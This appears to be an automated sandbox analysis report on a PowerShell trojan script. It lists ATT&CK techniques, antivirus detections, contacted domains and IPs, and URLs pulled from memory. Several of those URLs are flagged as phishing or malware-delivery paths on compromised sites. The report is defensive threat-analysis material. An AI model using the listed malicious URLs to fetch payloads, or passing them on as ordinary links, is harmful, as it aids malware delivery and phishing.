Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsPowerShell2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion31LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ps_script.ps18%VirustotalBrowse
ps_script.ps18%MetadefenderBrowse
ps_script.ps110%ReversingLabsScript-PowerShell.Trojan.Heuristic
ps_script.ps1100%AviraTR/PowerShell.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
wm.mcdevelop.net7%VirustotalBrowse
etdog.com9%VirustotalBrowse
freelancerwebdesignerhyderabad.com6%VirustotalBrowse
www.hintup.com.br8%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.hintup.com.br100%Avira URL Cloudphishing
https://mikegeerinck.com/wp-content/uploads/elementor/css/post-494.css?ver=16211919650%Avira URL Cloudsafe
http://freelancerwebdesignerhyderabad.com0%Avira URL Cloudsafe
http://etdog.com/index.php/2020/12/03/faq100%Avira URL Cloudphishing
https://mikegeerinck.com/about-me/0%Avira URL Cloudsafe
http://etdog.com/wp-content/uploads/2020/12/100%Avira URL Cloudphishing
https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1.jpg0%Avira URL Cloudsafe
https://mikegeerinck.com/our-team/0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-Logo-MG-100x98-1.png0%Avira URL Cloudsafe
http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1525.css?ver=16211597020%Avira URL Cloudsafe
https://dream-media.net0%Avira URL Cloudsafe
https://mikegeerinck.com/contact/0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.png100%Avira URL Cloudphishing
http://mikegeerinck.com0%Avira URL Cloudsafe
http://etdog.com100%Avira URL Cloudphishing
http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1.jpeg0%Avira URL Cloudsafe
http://www.turkishporn.mobi/0%Avira URL Cloudsafe
http://www.turkishxxxvideos.eu/0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/uploads/2021/04/proposal-202x300.jpg0%Avira URL Cloudsafe
https://www.stmarouns.nsw.edu.au/paypal/b8G/100%Avira URL Cloudphishing
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)0%Avira URL Cloudsafe
http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.css100%Avira URL Cloudphishing
https://mikegeerinck.com/wp-content/uploads/2021/04/proposal.jpg0%Avira URL Cloudsafe
http://cdn.jsinit.directfwd.com/sk-jspark_init.php0%Avira URL Cloudsafe
http://etdog.com/index.php/wp-json/100%Avira URL Cloudphishing
http://www.stmarouns.nsw.edu.au0%Avira URL Cloudsafe
https://my.hintup.io0%Avira URL Cloudsafe
http://etdog.com/wp-content/uploads/2020/12/2-2.png)100%Avira URL Cloudphishing
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://cps.letsencrypt.org00%URL Reputationsafe
http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
http://en.etdog.com/100%Avira URL Cloudphishing
https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.1.20%Avira URL Cloudsafe
https://mikegeerinck.comx0%Avira URL Cloudsafe
http://wm.mcdevelop.net0%Avira URL Cloudsafe
http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/100%Avira URL Cloudphishing
https://mikegeerinck.com/c/YYsa/100%Avira URL Cloudmalware
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-element0%Avira URL Cloudsafe
http://www.stmarouns.nsw.edu.au/paypal/b8G/100%Avira URL Cloudmalware
https://mikegeerinck.com/feed/0%Avira URL Cloudsafe
http://wm.mcdevelop.netx0%Avira URL Cloudsafe
https://dream-media.net/client-accelerator-method/0%Avira URL Cloudsafe
http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
https://mikegeerinck.com/30-min-strategy-session/0%Avira URL Cloudsafe
http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.js100%Avira URL Cloudphishing
http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.20%Avira URL Cloudsafe
https://www.hintup.com.br/wp-content/dE/100%Avira URL Cloudphishing
https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs_ajax_pagination.js?ver=3.10%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/images/placeholder.png0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/uploads/elementor/css/post-892.css?ver=16211602000%Avira URL Cloudsafe
http://www.turkishporno.online/0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/uploads/elementor/css/post-6.css?ver=16211602000%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.2.30%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs0%Avira URL Cloudsafe
https://script-creators.com/0%Avira URL Cloudsafe
http://www.turkishxxx.online/0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-json/0%Avira URL Cloudsafe
http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=30%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1504.css?ver=16211602000%Avira URL Cloudsafe
https://www.hintup.com.brx0%Avira URL Cloudsafe
http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.js100%Avira URL Cloudphishing
http://o.ss2.us/00%URL Reputationsafe
http://o.ss2.us/00%URL Reputationsafe
http://o.ss2.us/00%URL Reputationsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)0%Avira URL Cloudsafe
https://mikegeerinck.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
https://e-proposals.io/0%Avira URL Cloudsafe
https://www.mikegeerinck.com/blog/0%Avira URL Cloudsafe
http://www.stmarouns.nsw.edu.aux0%Avira URL Cloudsafe
http://www.turkishsex.online/0%Avira URL Cloudsafe
https://www.stmarouns.nsw.edu.aux0%Avira URL Cloudsafe
http://www.turkishporno.pro/0%Avira URL Cloudsafe
https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/css/ecs-style.css?ver=3.1.00%Avira URL Cloudsafe
http://olympiasoft.io/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
wm.mcdevelop.net
159.65.89.222
truetrueunknown
etdog.com
45.116.14.210
truetrueunknown
freelancerwebdesignerhyderabad.com
162.241.148.243
truetrueunknown
www.hintup.com.br
172.67.223.27
truetrueunknown
admintk.com
216.127.164.209
truefalse
    		high
    mikegeerinck.com
    		35.214.199.246
    		truetrue
      		unknown
      www.stmarouns.nsw.edu.au
      		143.204.98.64
      		truetrue
        		unknown
        x1.i.lencr.org
        		unknown
        		unknownfalse
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://www.stmarouns.nsw.edu.au/paypal/b8G/true
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://admintk.com/wp-admin/L/powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpfalse
            		high
            http://www.hintup.com.brpowershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmptrue
            • Avira URL Cloud: phishing
            		unknown
            https://mikegeerinck.com/wp-content/uploads/elementor/css/post-494.css?ver=1621191965powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://freelancerwebdesignerhyderabad.compowershell.exe, 00000002.00000002.323080629.000001B61112D000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://etdog.com/index.php/2020/12/03/faqpowershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
            • Avira URL Cloud: phishing
            		unknown
            https://mikegeerinck.com/about-me/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://etdog.com/wp-content/uploads/2020/12/powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmptrue
            • Avira URL Cloud: phishing
            		unknown
            https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1.jpgpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://mikegeerinck.com/our-team/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://admintk.compowershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmpfalse
              		high
              https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-Logo-MG-100x98-1.pngpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.rootg2.amazontrust.com08powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1525.css?ver=1621159702powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://connect.facebook.net/en_US/fbevents.jsA69S.dll.2.drfalse
                		high
                https://dream-media.netpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://mikegeerinck.com/contact/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://mikegeerinck.com/wp-includes/wlwmanifest.xmlpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpfalse
                  		high
                  http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.pngpowershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://mikegeerinck.compowershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://etdog.compowershell.exe, 00000002.00000002.323111990.000001B61115B000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://crl.sca1b.amazontrust.com/sca1b.crl0powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1.jpegpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.turkishporn.mobi/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.turkishxxxvideos.eu/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://mikegeerinck.com/wp-content/uploads/2021/04/proposal-202x300.jpgpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.stmarouns.nsw.edu.au/paypal/b8G/powershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: phishing
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.332217824.00000199B17A1000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.318767737.000001B60FDF1000.00000004.00000001.sdmpfalse
                    		high
                    https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.csspowershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    https://mikegeerinck.com/wp-content/uploads/2021/04/proposal.jpgpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://cdn.jsinit.directfwd.com/sk-jspark_init.phppowershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://etdog.com/index.php/wp-json/powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://www.stmarouns.nsw.edu.aupowershell.exe, 00000002.00000002.323384618.000001B611293000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://my.hintup.iopowershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://etdog.com/wp-content/uploads/2020/12/2-2.png)powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    https://twitter.com/edog.compowershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://cps.letsencrypt.org0powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://ocsp.sca1b.amazontrust.com06powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpfalse
                        		high
                        http://en.etdog.com/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.1.2powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mikegeerinck.comxpowershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://wm.mcdevelop.netpowershell.exe, 00000002.00000002.323427840.000001B6112CA000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://mikegeerinck.com/c/YYsa/powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mikegeerinck.com/feed/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://wm.mcdevelop.netxpowershell.exe, 00000002.00000002.323427840.000001B6112CA000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://dream-media.net/client-accelerator-method/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.rootca1.amazontrust.com/rootca1.crl0powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://mikegeerinck.com/30-min-strategy-session/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.jspowershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        http://ocsp.rootca1.amazontrust.com0:powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://mikegeerinck.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.2powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.hintup.com.br/wp-content/dE/powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs_ajax_pagination.js?ver=3.1powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://schema.orgpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                          		high
                          https://mikegeerinck.com/wp-content/plugins/elementor/assets/images/placeholder.pngpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://mikegeerinck.com/wp-content/uploads/elementor/css/post-892.css?ver=1621160200powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.turkishporno.online/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpfalse
                            		high
                            https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?verpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mikegeerinck.com/wp-content/uploads/elementor/css/post-6.css?ver=1621160200powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.2.3powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cspowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.tutorialrepublic.com/examples/images/clients/1.jpgpowershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drfalse
                              		high
                              https://script-creators.com/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.turkishxxx.online/powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://mikegeerinck.com/wp-json/powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.rootg2.amazontrust.com/rootg2.crl0powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?verpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);srcpowershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1504.css?ver=1621160200powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.hintup.com.brxpowershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.jspowershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
